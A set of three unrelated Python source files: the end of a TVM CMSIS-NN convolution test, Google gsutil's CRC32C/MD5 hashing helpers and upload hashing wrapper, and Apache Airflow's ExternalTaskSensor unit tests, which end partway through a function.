cmsisnn_mod = cmsisnn.partition_for_cmsisnn(orig_mod, params)
# validate pattern matching
assert_partitioned_function(orig_mod, cmsisnn_mod)
# validate the output
rng = np.random.default_rng(12345)
inputs = {"input": rng.integers(in_min, high=in_max, size=ifm_shape, dtype=dtype)}
output_list = generate_ref_data(orig_mod["main"], inputs, params)
compile_and_run(
AOTTestModel(
module=cmsisnn_mod,
inputs=inputs,
outputs=output_list,
params=params,
output_tolerance=1,
),
test_runner,
interface_api,
use_unpacked_api,
)
def parameterize_for_invalid_model(test):
in_dtype = ["uint8", "int8"]
kernel_dtype = ["uint8", "int8"]
kernel_zero_point = [-33, 10, 0]
all_combinations = itertools.product(in_dtype, kernel_dtype, kernel_zero_point)
all_combinations = filter(
lambda parameters: not (
parameters[0] == "int8" and parameters[1] == "int8" and parameters[2] == 0
),
all_combinations,
)
return pytest.mark.parametrize(
["in_dtype", "kernel_dtype", "kernel_zero_point"],
all_combinations,
)(test)
@tvm.testing.requires_cmsisnn
@parameterize_for_invalid_model
def test_invalid_parameters(
in_dtype,
kernel_dtype,
kernel_zero_point,
):
ifm_shape = (1, 28, 28, 12)
out_channels = 2
input_scale = 1
input_zero_point = 24
kernel_scale = [0.11, 0.0237]
in_min, in_max = get_range_for_dtype_str(in_dtype)
kernel_layout = "HWIO"
kernel_shape = [3, 3, ifm_shape[3], out_channels]
output_scale, output_zero_point = get_conv2d_qnn_params(
kernel_shape,
input_scale,
input_zero_point,
kernel_scale,
kernel_zero_point,
in_dtype,
kernel_dtype,
in_dtype,
False,
)
model, params = make_model(
shape=ifm_shape,
kernel_shape=kernel_shape,
input_zero_point=input_zero_point,
input_scale=input_scale,
kernel_zero_point=kernel_zero_point,
kernel_scale=kernel_scale,
output_zero_point=output_zero_point,
output_scale=output_scale,
padding="SAME",
strides=(1, 1),
dilation=(1, 1),
groups=1,
dtype=in_dtype,
kernel_dtype=kernel_dtype,
out_channels=out_channels,
weight_format=kernel_layout,
enable_bias=True,
relu_type="NONE",
)
orig_mod = make_module(model)
cmsisnn_mod = cmsisnn.partition_for_cmsisnn(orig_mod, params)
assert_no_external_function(cmsisnn_mod)
if __name__ == "__main__":
sys.exit(pytest.main([__file__] + sys.argv[1:]))
|
|
# -*- coding: utf-8 -*-
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper functions for hashing functionality."""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import base64
import binascii
import hashlib
import os
import six
from boto import config
import crcmod
from gslib.exception import CommandException
from gslib.utils.boto_util import UsingCrcmodExtension
from gslib.utils.constants import DEFAULT_FILE_BUFFER_SIZE
from gslib.utils.constants import MIN_SIZE_COMPUTE_LOGGING
from gslib.utils.constants import TRANSFER_BUFFER_SIZE
from gslib.utils.constants import UTF8
SLOW_CRCMOD_WARNING = """
WARNING: You have requested checksumming but your crcmod installation isn't
using the module's C extension, so checksumming will run very slowly. For help
installing the extension, please see "gsutil help crcmod".
"""
SLOW_CRCMOD_RSYNC_WARNING = """
WARNING: gsutil rsync uses hashes when modification time is not available at
both the source and destination. Your crcmod installation isn't using the
module's C extension, so checksumming will run very slowly. If this is your
first rsync since updating gsutil, this rsync can take significantly longer than
usual. For help installing the extension, please see "gsutil help crcmod".
"""
_SLOW_CRCMOD_DOWNLOAD_WARNING = """
WARNING: Downloading this composite object requires integrity checking with
CRC32c, but your crcmod installation isn't using the module's C extension,
so the hash computation will likely throttle download performance. For help
installing the extension, please see "gsutil help crcmod".
To disable slow integrity checking, see the "check_hashes" option in your
boto config file.
"""
_SLOW_CRC_EXCEPTION_TEXT = """
Downloading this composite object requires integrity checking with CRC32c,
but your crcmod installation isn't using the module's C extension, so the
hash computation will likely throttle download performance. For help
installing the extension, please see "gsutil help crcmod".
To download regardless of crcmod performance or to skip slow integrity
checks, see the "check_hashes" option in your boto config file.
NOTE: It is strongly recommended that you not disable integrity checks. Doing so
could allow data corruption to go undetected during uploading/downloading."""
_NO_HASH_CHECK_WARNING = """
WARNING: This download will not be validated since your crcmod installation
doesn't use the module's C extension, so the hash computation would likely
throttle download performance. For help in installing the extension, please
see "gsutil help crcmod".
To force integrity checking, see the "check_hashes" option in your boto config
file.
"""
# Configuration values for hashing.
CHECK_HASH_IF_FAST_ELSE_FAIL = 'if_fast_else_fail'
CHECK_HASH_IF_FAST_ELSE_SKIP = 'if_fast_else_skip'
CHECK_HASH_ALWAYS = 'always'
CHECK_HASH_NEVER = 'never'
# Table storing polynomial values of x^(2^k) mod CASTAGNOLI_POLY for all k < 31,
# where x^(2^k) and CASTAGNOLI_POLY are both considered polynomials. This is
# sufficient since x^(2^31) mod CASTAGNOLI_POLY = x.
X_POW_2K_TABLE = [
2, 4, 16, 256, 65536, 517762881, 984302966, 408362264, 1503875210,
2862076957, 3884826397, 1324787473, 621200174, 1758783527, 1416537776,
1180494764, 648569364, 2521473789, 994858823, 1728245375, 3498467999,
4059169852, 3345064394, 2828422810, 2429203150, 3336788029, 860151998,
2102628683, 1033187991, 4243778976, 1123580069
]
# Castagnoli polynomial and its degree.
CASTAGNOLI_POLY = 4812730177
DEGREE = 32
def ConcatCrc32c(crc_a, crc_b, num_bytes_in_b):
"""Computes CRC32C for concat(A, B) given crc(A), crc(B) and len(B).
An explanation of the algorithm can be found at
crcutil.googlecode.com/files/crc-doc.1.0.pdf.
Args:
crc_a: A 32-bit integer representing crc(A) with least-significant
coefficient first.
crc_b: Same as crc_a.
num_bytes_in_b: Length of B in bytes.
Returns:
CRC32C for concat(A, B)
"""
if not num_bytes_in_b:
return crc_a
return _ExtendByZeros(crc_a, 8 * num_bytes_in_b) ^ crc_b
def _CrcMultiply(p, q):
"""Multiplies two polynomials together modulo CASTAGNOLI_POLY.
Args:
p: The first polynomial.
q: The second polynomial.
Returns:
Result of the multiplication.
"""
result = 0
top_bit = 1 << DEGREE
for _ in range(DEGREE):
if p & 1:
result ^= q
q <<= 1
if q & top_bit:
q ^= CASTAGNOLI_POLY
p >>= 1
return result
def _ExtendByZeros(crc, num_bits):
"""Given crc representing polynomial P(x), compute P(x)*x^num_bits.
Args:
crc: crc respresenting polynomial P(x).
num_bits: number of bits in crc.
Returns:
P(x)*x^num_bits
"""
def _ReverseBits32(crc):
return int('{0:032b}'.format(crc, width=32)[::-1], 2)
crc = _ReverseBits32(crc)
i = 0
while num_bits != 0:
if num_bits & 1:
crc = _CrcMultiply(crc, X_POW_2K_TABLE[i % len(X_POW_2K_TABLE)])
i += 1
num_bits >>= 1
crc = _ReverseBits32(crc)
return crc
def _CalculateHashFromContents(fp, hash_alg):
"""Calculates a base64 digest of the contents of a seekable stream.
This function resets the file pointer to position 0.
Args:
fp: An already-open file object.
hash_alg: Instance of hashing class initialized to start state.
Returns:
Hash of the stream in hex string format.
"""
hash_dict = {'placeholder': hash_alg}
fp.seek(0)
CalculateHashesFromContents(fp, hash_dict)
fp.seek(0)
return hash_dict['placeholder'].hexdigest()
def CalculateHashesFromContents(fp, hash_dict, callback_processor=None):
"""Calculates hashes of the contents of a file.
Args:
fp: An already-open file object (stream will be consumed).
hash_dict: Dict of (string alg_name: initialized hashing class)
Hashing class will be populated with digests upon return.
callback_processor: Optional callback processing class that implements
Progress(integer amount of bytes processed).
"""
while True:
data = fp.read(DEFAULT_FILE_BUFFER_SIZE)
if not data:
break
if six.PY3:
if isinstance(data, str):
data = data.encode(UTF8)
for hash_alg in six.itervalues(hash_dict):
hash_alg.update(data)
if callback_processor:
callback_processor.Progress(len(data))
def CalculateB64EncodedCrc32cFromContents(fp):
"""Calculates a base64 CRC32c checksum of the contents of a seekable stream.
This function sets the stream position 0 before and after calculation.
Args:
fp: An already-open file object.
Returns:
CRC32c checksum of the file in base64 format.
"""
return _CalculateB64EncodedHashFromContents(fp,
crcmod.predefined.Crc('crc-32c'))
def CalculateB64EncodedMd5FromContents(fp):
"""Calculates a base64 MD5 digest of the contents of a seekable stream.
This function sets the stream position 0 before and after calculation.
Args:
fp: An already-open file object.
Returns:
MD5 digest of the file in base64 format.
"""
return _CalculateB64EncodedHashFromContents(fp, GetMd5())
def CalculateMd5FromContents(fp):
"""Calculates a base64 MD5 digest of the contents of a seekable stream.
This function sets the stream position 0 before and after calculation.
Args:
fp: An already-open file object.
Returns:
MD5 digest of the file in hex format.
"""
return _CalculateHashFromContents(fp, GetMd5())
def Base64EncodeHash(digest_value):
"""Returns the base64-encoded version of the input hex digest value."""
encoded_bytes = base64.b64encode(binascii.unhexlify(digest_value))
return encoded_bytes.rstrip(b'\n').decode(UTF8)
def Base64ToHexHash(base64_hash):
"""Returns the hex digest value of the input base64-encoded hash.
Args:
base64_hash: Base64-encoded hash, which may contain newlines and single or
double quotes.
Returns:
Hex digest of the input argument.
"""
decoded_bytes = base64.b64decode(base64_hash.strip('\n"\'').encode(UTF8))
return binascii.hexlify(decoded_bytes)
def _CalculateB64EncodedHashFromContents(fp, hash_alg):
"""Calculates a base64 digest of the contents of a seekable stream.
This function sets the stream position 0 before and after calculation.
Args:
fp: An already-open file object.
hash_alg: Instance of hashing class initialized to start state.
Returns:
Hash of the stream in base64 format.
"""
return Base64EncodeHash(_CalculateHashFromContents(fp, hash_alg))
def GetUploadHashAlgs():
"""Returns a dict of hash algorithms for validating an uploaded object.
This is for use only with single object uploads, not compose operations
such as those used by parallel composite uploads (though it can be used to
validate the individual components).
Returns:
dict of (algorithm_name: hash_algorithm)
"""
check_hashes_config = config.get('GSUtil', 'check_hashes',
CHECK_HASH_IF_FAST_ELSE_FAIL)
if check_hashes_config == 'never':
return {}
return {'md5': GetMd5}
def GetDownloadHashAlgs(logger, consider_md5=False, consider_crc32c=False):
"""Returns a dict of hash algorithms for validating an object.
Args:
logger: logging.Logger for outputting log messages.
consider_md5: If True, consider using a md5 hash.
consider_crc32c: If True, consider using a crc32c hash.
Returns:
Dict of (string, hash algorithm).
Raises:
CommandException if hash algorithms satisfying the boto config file
cannot be returned.
"""
check_hashes_config = config.get('GSUtil', 'check_hashes',
CHECK_HASH_IF_FAST_ELSE_FAIL)
if check_hashes_config == CHECK_HASH_NEVER:
return {}
hash_algs = {}
if consider_md5:
hash_algs['md5'] = GetMd5
elif consider_crc32c:
# If the cloud provider supplies a CRC, we'll compute a checksum to
# validate if we're using a native crcmod installation and MD5 isn't
# offered as an alternative.
if UsingCrcmodExtension():
hash_algs['crc32c'] = lambda: crcmod.predefined.Crc('crc-32c')
elif not hash_algs:
if check_hashes_config == CHECK_HASH_IF_FAST_ELSE_FAIL:
raise CommandException(_SLOW_CRC_EXCEPTION_TEXT)
elif check_hashes_config == CHECK_HASH_IF_FAST_ELSE_SKIP:
logger.warn(_NO_HASH_CHECK_WARNING)
elif check_hashes_config == CHECK_HASH_ALWAYS:
logger.warn(_SLOW_CRCMOD_DOWNLOAD_WARNING)
hash_algs['crc32c'] = lambda: crcmod.predefined.Crc('crc-32c')
else:
raise CommandException(
'Your boto config \'check_hashes\' option is misconfigured.')
return hash_algs
def GetMd5(byte_string=b''):
"""Returns md5 object, avoiding incorrect FIPS error on Red Hat systems.
Examples: GetMd5(b'abc')
GetMd5(bytes('abc', encoding='utf-8'))
Args:
byte_string (bytes): String in bytes form to hash. Don't include for empty
hash object, since md5(b'').digest() == md5().digest().
Returns:
md5 hash object.
"""
try:
return hashlib.md5(byte_string)
except ValueError:
# On Red Hat-based platforms, may catch a FIPS error.
# "usedforsecurity" flag only available on Red Hat systems or Python 3.9+.
# pylint:disable=unexpected-keyword-arg
return hashlib.md5(byte_string, usedforsecurity=False)
# pylint:enable=unexpected-keyword-arg
class HashingFileUploadWrapper(object):
"""Wraps an input stream in a hash digester and exposes a stream interface.
This class provides integrity checking during file uploads via the
following properties:
Calls to read will appropriately update digesters with all bytes read.
Calls to seek (assuming it is supported by the wrapped stream) using
os.SEEK_SET will catch up / reset the digesters to the specified
position. If seek is called with a different os.SEEK mode, the caller
must return to the original position using os.SEEK_SET before further
reads.
Calls to seek are fast if the desired position is equal to the position at
the beginning of the last read call (we only need to re-hash bytes
from that point on).
"""
def __init__(self, stream, digesters, hash_algs, src_url, logger):
"""Initializes the wrapper.
Args:
stream: Input stream.
digesters: dict of {string: hash digester} containing digesters, where
string is the name of the hash algorithm.
hash_algs: dict of {string: hash algorithm} for resetting and
recalculating digesters. String is the name of the hash algorithm.
src_url: Source FileUrl that is being copied.
logger: For outputting log messages.
"""
if not digesters:
raise CommandException('HashingFileUploadWrapper used with no digesters.')
elif not hash_algs:
raise CommandException('HashingFileUploadWrapper used with no hash_algs.')
self._orig_fp = stream
self._digesters = digesters
self._src_url = src_url
self._logger = logger
self._seek_away = None
self._digesters_previous = {}
for alg in self._digesters:
self._digesters_previous[alg] = self._digesters[alg].copy()
self._digesters_previous_mark = 0
self._digesters_current_mark = 0
self._hash_algs = hash_algs
@property
def mode(self):
"""Returns the mode of the underlying file descriptor, or None."""
return getattr(self._orig_fp, 'mode', None)
def read(self, size=-1): # pylint: disable=invalid-name
""""Reads from the wrapped file pointer and calculates hash digests.
Args:
size: The amount of bytes to read. If ommited or negative, the entire
contents of the file will be read, hashed, and returned.
Returns:
Bytes from the wrapped stream.
Raises:
CommandException if the position of the wrapped stream is unknown.
"""
if self._seek_away is not None:
raise CommandException('Read called on hashing file pointer in an '
'unknown position; cannot correctly compute '
'digest.')
data = self._orig_fp.read(size)
if isinstance(data, six.text_type):
data = data.encode(UTF8)
self._digesters_previous_mark = self._digesters_current_mark
for alg in self._digesters:
self._digesters_previous[alg] = self._digesters[alg].copy()
self._digesters[alg].update(data)
self._digesters_current_mark += len(data)
return data
def tell(self): # pylint: disable=invalid-name
"""Returns the current stream position."""
return self._orig_fp.tell()
def seekable(self): # pylint: disable=invalid-name
"""Returns true if the stream is seekable."""
return self._orig_fp.seekable()
def seek(self, offset, whence=os.SEEK_SET): # pylint: disable=invalid-name
"""Seeks in the wrapped file pointer and catches up hash digests.
Args:
offset: The offset to seek to.
whence: os.SEEK_CUR, or SEEK_END, SEEK_SET.
Returns:
Return value from the wrapped stream's seek call.
"""
if whence != os.SEEK_SET:
# We do not catch up hashes for non-absolute seeks, and rely on the
# caller to seek to an absolute position before reading.
self._seek_away = self._orig_fp.tell()
else:
# Hashes will be correct and it's safe to call read().
self._seek_away = None
if offset < self._digesters_previous_mark:
# This is earlier than our earliest saved digest, so we need to
# reset the digesters and scan from the beginning.
for alg in self._digesters:
self._digesters[alg] = self._hash_algs[alg]()
self._digesters_current_mark = 0
self._orig_fp.seek(0)
self._CatchUp(offset)
elif offset == self._digesters_previous_mark:
# Just load the saved digests.
self._digesters_current_mark = self._digesters_previous_mark
for alg in self._digesters:
self._digesters[alg] = self._digesters_previous[alg]
elif offset < self._digesters_current_mark:
# Reset the position to our previous digest and scan forward.
self._digesters_current_mark = self._digesters_previous_mark
for alg in self._digesters:
self._digesters[alg] = self._digesters_previous[alg]
self._orig_fp.seek(self._digesters_previous_mark)
self._CatchUp(offset - self._digesters_previous_mark)
else:
# Scan forward from our current digest and position.
self._orig_fp.seek(self._digesters_current_mark)
self._CatchUp(offset - self._digesters_current_mark)
return self._orig_fp.seek(offset, whence)
def _CatchUp(self, bytes_to_read):
"""Catches up hashes, but does not return data and uses little memory.
Before calling this function, digesters_current_mark should be updated
to the current location of the original stream and the self._digesters
should be current to that point (but no further).
Args:
bytes_to_read: Number of bytes to catch up from the original stream.
"""
if self._orig_fp.tell() != self._digesters_current_mark:
raise CommandException(
'Invalid mark when catching up hashes. Stream position %s, hash '
'position %s' % (self._orig_fp.tell(), self._digesters_current_mark))
for alg in self._digesters:
if bytes_to_read >= MIN_SIZE_COMPUTE_LOGGING:
self._logger.debug('Catching up %s for %s...', alg,
self._src_url.url_string)
self._digesters_previous[alg] = self._digesters[alg].copy()
self._digesters_previous_mark = self._digesters_current_mark
bytes_remaining = bytes_to_read
bytes_this_round = min(bytes_remaining, TRANSFER_BUFFER_SIZE)
while bytes_this_round:
data = self._orig_fp.read(bytes_this_round)
if isinstance(data, six.text_type):
data = data.encode(UTF8)
bytes_remaining -= bytes_this_round
for alg in self._digesters:
self._digesters[alg].update(data)
bytes_this_round = min(bytes_remaining, TRANSFER_BUFFER_SIZE)
self._digesters_current_mark += bytes_to_read
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import unittest
from datetime import time, timedelta
import pytest
from airflow import exceptions, settings
from airflow.exceptions import AirflowException, AirflowSensorTimeout
from airflow.models import DagBag, DagRun, TaskInstance
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskMarker, ExternalTaskSensor
from airflow.sensors.time_sensor import TimeSensor
from airflow.serialization.serialized_objects import SerializedBaseOperator
from airflow.utils.session import provide_session
from airflow.utils.state import DagRunState, State, TaskInstanceState
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.db import clear_db_runs
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'unit_test_dag'
TEST_TASK_ID = 'time_sensor_check'
TEST_TASK_ID_ALTERNATE = 'time_sensor_check_alternate'
DEV_NULL = '/dev/null'
@pytest.fixture(autouse=True)
def clean_db():
clear_db_runs()
class TestExternalTaskSensor(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
def test_time_sensor(self, task_id=TEST_TASK_ID):
op = TimeSensor(task_id=task_id, target_time=time(0), dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_multiple_task_ids(self):
self.test_time_sensor(task_id=TEST_TASK_ID)
self.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_catch_overlap_allowed_failed_state(self):
with pytest.raises(AirflowException):
ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=[State.SUCCESS],
failed_states=[State.SUCCESS],
dag=self.dag,
)
def test_external_task_sensor_wrong_failed_states(self):
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
failed_states=["invalid_state"],
dag=self.dag,
)
def test_external_task_sensor_failed_states(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
failed_states=["failed"],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_failed_states_as_success(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=["failed"],
failed_states=["success"],
dag=self.dag,
)
with self.assertLogs(op.log, level=logging.INFO) as cm:
with pytest.raises(AirflowException) as ctx:
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
assert (
'INFO:airflow.task.operators:Poking for tasks [\'time_sensor_check\']'
' in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
)
assert (
str(ctx.value) == "Some of the external tasks "
"['time_sensor_check'] in DAG "
"unit_test_dag failed."
)
def test_external_task_sensor_failed_states_as_success_mulitple_task_ids(self):
self.test_time_sensor(task_id=TEST_TASK_ID)
self.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
allowed_states=["failed"],
failed_states=["success"],
dag=self.dag,
)
with self.assertLogs(op.log, level=logging.INFO) as cm:
with pytest.raises(AirflowException) as ctx:
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
assert (
'INFO:airflow.task.operators:Poking for tasks '
'[\'time_sensor_check\', \'time_sensor_check_alternate\'] '
'in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
)
assert (
str(ctx.value) == "Some of the external tasks "
"['time_sensor_check', 'time_sensor_check_alternate'] in DAG "
"unit_test_dag failed."
)
def test_external_dag_sensor(self):
other_dag = DAG('other_dag', default_args=self.args, end_date=DEFAULT_DATE, schedule_interval='@once')
other_dag.create_dagrun(
run_id='test', start_date=DEFAULT_DATE, execution_date=DEFAULT_DATE, state=State.SUCCESS
)
op = ExternalTaskSensor(
task_id='test_external_dag_sensor_check',
external_dag_id='other_dag',
external_task_id=None,
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn_multiple_execution_dates(self):
bash_command_code = """
{% set s=logical_date.time().second %}
echo "second is {{ s }}"
if [[ $(( {{ s }} % 60 )) == 1 ]]
then
exit 1
fi
exit 0
"""
dag_external_id = TEST_DAG_ID + '_external'
dag_external = DAG(dag_external_id, default_args=self.args, schedule_interval=timedelta(seconds=1))
task_external_with_failure = BashOperator(
task_id="task_external_with_failure", bash_command=bash_command_code, retries=0, dag=dag_external
)
task_external_without_failure = DummyOperator(
task_id="task_external_without_failure", retries=0, dag=dag_external
)
task_external_without_failure.run(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE + timedelta(seconds=1), ignore_ti_state=True
)
session = settings.Session()
TI = TaskInstance
try:
task_external_with_failure.run(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE + timedelta(seconds=1), ignore_ti_state=True
)
# The test_with_failure task is excepted to fail
# once per minute (the run on the first second of
# each minute).
except Exception as e:
failed_tis = (
session.query(TI)
.filter(
TI.dag_id == dag_external_id,
TI.state == State.FAILED,
TI.execution_date == DEFAULT_DATE + timedelta(seconds=1),
)
.all()
)
if len(failed_tis) == 1 and failed_tis[0].task_id == 'task_external_with_failure':
pass
else:
raise e
dag_id = TEST_DAG_ID
dag = DAG(dag_id, default_args=self.args, schedule_interval=timedelta(minutes=1))
task_without_failure = ExternalTaskSensor(
task_id='task_without_failure',
external_dag_id=dag_external_id,
external_task_id='task_external_without_failure',
execution_date_fn=lambda dt: [dt + timedelta(seconds=i) for i in range(2)],
allowed_states=['success'],
retries=0,
timeout=1,
poke_interval=1,
dag=dag,
)
task_with_failure = ExternalTaskSensor(
task_id='task_with_failure',
external_dag_id=dag_external_id,
external_task_id='task_external_with_failure',
execution_date_fn=lambda dt: [dt + timedelta(seconds=i) for i in range(2)],
allowed_states=['success'],
retries=0,
timeout=1,
poke_interval=1,
dag=dag,
)
task_without_failure.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
with pytest.raises(AirflowSensorTimeout):
task_with_failure.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_delta(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_delta=timedelta(0),
allowed_states=['success'],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn(self):
self.test_time_sensor()
# check that the execution_fn works
op1 = ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta_1',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=lambda dt: dt + timedelta(0),
allowed_states=['success'],
dag=self.dag,
)
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
# double check that the execution is being called by failing the test
op2 = ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta_2',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=lambda dt: dt + timedelta(days=1),
allowed_states=['success'],
timeout=1,
poke_interval=1,
dag=self.dag,
)
with pytest.raises(exceptions.AirflowSensorTimeout):
op2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn_multiple_args(self):
"""Check this task sensor passes multiple args with full context. If no failure, means clean run."""
self.test_time_sensor()
def my_func(dt, context):
assert context['logical_date'] == dt
return dt + timedelta(0)
op1 = ExternalTaskSensor(
task_id='test_external_task_sensor_multiple_arg_fn',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=my_func,
allowed_states=['success'],
dag=self.dag,
)
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn_kwargs(self):
"""Check this task sensor passes multiple args with full context. If no failure, means clean run."""
self.test_time_sensor()
def my_func(dt, ds_nodash, tomorrow_ds_nodash):
assert ds_nodash == dt.strftime("%Y%m%d")
assert tomorrow_ds_nodash == (dt + timedelta(days=1)).strftime("%Y%m%d")
return dt + timedelta(0)
op1 = ExternalTaskSensor(
task_id='test_external_task_sensor_fn_kwargs',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=my_func,
allowed_states=['success'],
dag=self.dag,
)
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_error_delta_and_fn(self):
self.test_time_sensor()
# Test that providing execution_delta and a function raises an error
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_delta=timedelta(0),
execution_date_fn=lambda dt: dt,
allowed_states=['success'],
dag=self.dag,
)
def test_external_task_sensor_error_task_id_and_task_ids(self):
self.test_time_sensor()
# Test that providing execution_delta and a function raises an error
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_task_id_and_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
external_task_ids=[TEST_TASK_ID],
allowed_states=['success'],
dag=self.dag,
)
def test_catch_duplicate_task_ids(self):
self.test_time_sensor()
# Test By passing same task_id multiple times
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_duplicate_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID],
allowed_states=['success'],
dag=self.dag,
)
def test_catch_invalid_allowed_states(self):
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check_1',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=['invalid_state'],
dag=self.dag,
)
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check_2',
external_dag_id=TEST_DAG_ID,
external_task_id=None,
allowed_states=['invalid_state'],
dag=self.dag,
)
def test_external_task_sensor_waits_for_task_check_existence(self):
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id="example_bash_operator",
external_task_id="non-existing-task",
check_existence=True,
dag=self.dag,
)
with pytest.raises(AirflowException):
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_waits_for_dag_check_existence(self):
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id="non-existing-dag",
external_task_id=None,
check_existence=True,
dag=self.dag,
)
with pytest.raises(AirflowException):
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_templated(dag_maker, app):
with dag_maker():
ExternalTaskSensor(
task_id='templated_task',
external_dag_id='dag_{{ ds }}',
external_task_id='task_{{ ds }}',
)
dagrun = dag_maker.create_dagrun(run_type=DagRunType.SCHEDULED, execution_date=DEFAULT_DATE)
(instance,) = dagrun.task_instances
instance.render_templates()
assert instance.task.external_dag_id == f"dag_{DEFAULT_DATE.date()}"
assert instance.task.external_task_id == f"task_{DEFAULT_DATE.date()}"
# Verify that the operator link uses the rendered value of ``external_dag_id``.
app.config['SERVER_NAME'] = ""
with app.app_context():
url = instance.task.get_extra_links(DEFAULT_DATE, "External DAG")
